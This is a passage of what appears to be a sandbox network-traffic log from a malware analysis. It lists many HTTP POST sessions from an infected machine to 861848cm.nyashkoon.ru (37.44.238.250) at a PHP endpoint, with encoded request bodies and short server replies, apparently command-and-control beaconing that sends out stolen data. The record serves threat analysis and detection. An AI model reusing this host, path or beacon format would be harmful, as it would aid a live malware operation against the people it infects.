                                                                    Nov 6, 2024 03:39:08.797709942 CET1012OUTData Raw: 56 57 5a 5a 56 5c 50 5d 5a 5f 52 51 54 59 5b 53 55 55 59 57 51 56 52 58 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VWZZV\P]Z_RQTY[SUUYWQVRXQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%Y;-+4Y+0$>:_=[=3[#/P<]:<4$.Y&'X$.Q-*
                                                                    Nov 6, 2024 03:39:09.245186090 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:09.320733070 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:07 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    122192.168.2.45013037.44.238.25080
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:09.540478945 CET273OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:39:09.891505957 CET1012OUTData Raw: 56 51 5a 55 53 5f 55 5f 5a 5f 52 51 54 59 5b 5d 55 54 59 57 51 57 52 5a 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VQZUS_U_Z_RQTY[]UTYWQWRZQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%,?<^<+*:=Y*=)$(<[4?-+>7X-5$_#')2)'X$.Q-*
                                                                    Nov 6, 2024 03:39:10.352097988 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:10.428319931 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:08 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    123192.168.2.45013137.44.238.25080
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:10.558006048 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:10.907097101 CET1012OUTData Raw: 53 55 5f 58 56 58 55 5f 5a 5f 52 51 54 52 5b 5c 55 5c 59 5f 51 50 52 5e 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SU_XVXU_Z_RQTR[\U\Y_QPR^QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%],<1=87?U()**>938^#.U?<,&$]!4>^2)'X$.Q-
                                                                    Nov 6, 2024 03:39:11.376306057 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:11.453664064 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:09 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    124192.168.2.45013237.44.238.25080
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:11.581404924 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:11.938318014 CET1012OUTData Raw: 56 51 5a 55 53 5a 55 5e 5a 5f 52 51 54 5f 5b 52 55 54 59 5c 51 57 52 5b 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VQZUSZU^Z_RQT_[RUTY\QWR[QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%]/>=;4^(3(X)->-3^#<X.&$X#7>\&'X$.Q-2
                                                                    Nov 6, 2024 03:39:12.392910957 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:12.473086119 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    125192.168.2.45013337.44.238.25080
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:12.595108986 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:12.953946114 CET1012OUTData Raw: 56 57 5a 5b 56 5e 55 5a 5a 5f 52 51 54 59 5b 5c 55 55 59 5a 51 53 52 5d 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VWZ[V^UZZ_RQTY[\UUYZQSR]QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&8,-<'>3'>:=[*.:\%8'#/*<Y.60 7&^1'X$.Q-*
                                                                    Nov 6, 2024 03:39:13.404814005 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:13.476664066 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:11 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    126192.168.2.45013437.44.238.25080
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:13.601519108 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1008
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:13.953950882 CET1008OUTData Raw: 53 52 5f 5e 53 5f 55 5f 5a 5f 52 51 54 5a 5b 5c 55 56 59 5b 51 51 52 5b 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SR_^S_U_Z_RQTZ[\UVY[QQR[QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&8>?#(0'>:)Y>*\$8 ?"<>$95# Q%1'X$.Q->


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    127192.168.2.45013537.44.238.25080
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:14.281761885 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1276
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:14.625896931 CET1276OUTData Raw: 53 53 5a 5a 56 5d 50 5f 5a 5f 52 51 54 5e 5b 52 55 53 59 58 51 54 52 52 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SSZZV]P_Z_RQT^[RUSYXQTRRQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%]/>W=(<]?3=92*-%3X =(?.6;77:&)'X$.Q-6
                                                                    Nov 6, 2024 03:39:15.093873024 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:15.173933029 CET308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:13 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 00 1e 20 17 3c 14 3a 58 27 5d 28 52 3d 2e 21 58 3f 30 01 16 2c 32 38 12 3e 0d 28 59 3e 38 0a 1b 34 59 28 06 22 1c 22 05 20 31 33 12 2b 2b 21 5f 05 1d 39 1c 26 2a 37 0e 3e 22 26 59 3e 0e 2f 1e 25 30 06 09 28 38 29 03 37 39 22 1c 24 3d 26 01 25 32 0e 09 2b 1a 25 18 39 01 33 51 25 2a 2a 57 09 16 23 08 25 30 23 5e 29 21 2c 00 24 10 1b 10 25 03 20 0a 3e 2c 28 05 23 24 36 1a 2a 1d 05 5e 22 27 22 58 24 04 21 19 25 10 33 1a 29 32 26 55 22 0d 20 54 01 30 5d 4f
                                                                    Data Ascii: <:X'](R=.!X?0,28>(Y>84Y("" 13++!_9&*7>"&Y>/%0(8)79"$=&%2+%93Q%**W#%0#^)!,$% >,(#$6*^"'"X$!%3)2&U" T0]O


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    128192.168.2.45013637.44.238.25080
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:14.385215044 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:14.735388994 CET1012OUTData Raw: 53 56 5a 5a 56 59 50 59 5a 5f 52 51 54 59 5b 58 55 54 59 5f 51 57 52 5c 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SVZZVYPYZ_RQTY[XUTY_QWR\QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%/R+8\(3)95Y>>)3^(^"?V?X?-'4$>\1'X$.Q-*
                                                                    Nov 6, 2024 03:39:15.226516008 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:15.306854010 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:13 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    129192.168.2.45013737.44.238.25080
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:15.443428040 CET273OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:39:15.797815084 CET1012OUTData Raw: 56 5f 5a 5a 56 5e 50 59 5a 5f 52 51 54 5c 5b 58 55 5d 59 58 51 51 52 59 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: V_ZZV^PYZ_RQT\[XU]YXQQRYQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&-?*W($?U<Y=)=^)$84Y9<.,-$]#'1')'X$.Q->
                                                                    Nov 6, 2024 03:39:16.254158974 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:16.331206083 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:14 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    130192.168.2.45013837.44.238.25080
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:16.454763889 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:16.813807964 CET1012OUTData Raw: 56 5e 5a 54 56 5f 55 59 5a 5f 52 51 54 5b 5b 59 55 53 59 5c 51 5e 52 52 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: V^ZTV_UYZ_RQT[[YUSY\Q^RRQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&;<^((+>)=.*\'4[#?*(.$.%+#4!&9'X$.Q-"
                                                                    Nov 6, 2024 03:39:17.265634060 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:17.343631983 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:15 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    131192.168.2.45013937.44.238.25080
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:17.474858046 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:17.829047918 CET1012OUTData Raw: 56 53 5a 5b 56 59 50 5c 5a 5f 52 51 54 5b 5b 59 55 53 59 5d 51 5f 52 58 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VSZ[VYP\Z_RQT[[YUSY]Q_RXQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&8<1<^<_(0$X(9-))38'4Y:Q<-(.8!7&_')'X$.Q-"
                                                                    Nov 6, 2024 03:39:18.991398096 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:18.991413116 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:16 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP
                                                                    Nov 6, 2024 03:39:18.991425037 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:16 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP
                                                                    Nov 6, 2024 03:39:18.991436958 CET183INHTTP/1.1 100 Continue
                                                                    Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 30 36 20 4e 6f 76 20 32 30 32 34 20 30 32 3a 33 39 3a 31 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 0d 0a 32 56 59 50
                                                                    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Wed, 06 Nov 2024 02:39:16 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4Connection: keep-alive2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    132192.168.2.45014037.44.238.25080
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:19.119432926 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1008
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:19.469599009 CET1008OUTData Raw: 56 5e 5f 5c 53 5b 50 5b 5a 5f 52 51 54 5a 5b 5d 55 5c 59 57 51 5f 52 53 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: V^_\S[P[Z_RQTZ[]U\YWQ_RSQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%],/"U(; ^<?=)1X*--0Z",2W?.C?!'"^2'X$.Q-
                                                                    Nov 6, 2024 03:39:19.929331064 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:20.002082109 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    133192.168.2.45014137.44.238.25080
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:20.127691984 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    134192.168.2.45014237.44.238.25080
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:20.195708036 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1276
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:20.547849894 CET1276OUTData Raw: 56 53 5a 54 56 58 50 59 5a 5f 52 51 54 5d 5b 5b 55 5c 59 5c 51 52 52 58 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VSZTVXPYZ_RQT][[U\Y\QRRXQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&,?=(('?#$[**)^*"$8Y4<%).,5,47_%9'X$.Q-
                                                                    Nov 6, 2024 03:39:21.008579969 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:21.085596085 CET308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 00 1e 20 5d 3f 2a 22 5b 26 3b 34 16 2a 10 21 5b 2b 09 33 5f 2c 32 0d 02 3e 55 33 01 3e 28 0e 54 34 06 2f 58 35 32 35 58 21 31 3b 10 29 3b 21 5f 05 1d 3a 00 24 2a 2c 54 2a 22 3a 5e 2a 19 28 43 26 23 24 0b 28 38 29 03 37 3a 3d 0c 32 3e 22 02 27 21 37 16 3c 1a 0b 18 3a 06 2f 1d 32 00 2a 57 09 16 23 08 30 23 06 02 29 08 23 5e 24 58 35 1d 25 14 28 0c 3d 2c 33 59 23 24 2e 59 3d 1d 3b 5e 22 37 25 04 24 14 3a 07 24 3e 30 0e 3f 08 26 55 22 0d 20 54 01 30 5d 4f
                                                                    Data Ascii: ]?*"[&;4*![+3_,2>U3>(T4/X525X!1;);!_:$*,T*":^*(C&#$(8)7:=2>"'!7<:/2*W#0#)#^$X5%(=,3Y#$.Y=;^"7%$:$>0?&U" T0]O


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    135192.168.2.45014337.44.238.25080
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:20.313220978 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:20.657107115 CET1012OUTData Raw: 53 56 5f 5e 53 5a 50 59 5a 5f 52 51 54 53 5b 5c 55 5d 59 5a 51 51 52 5d 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
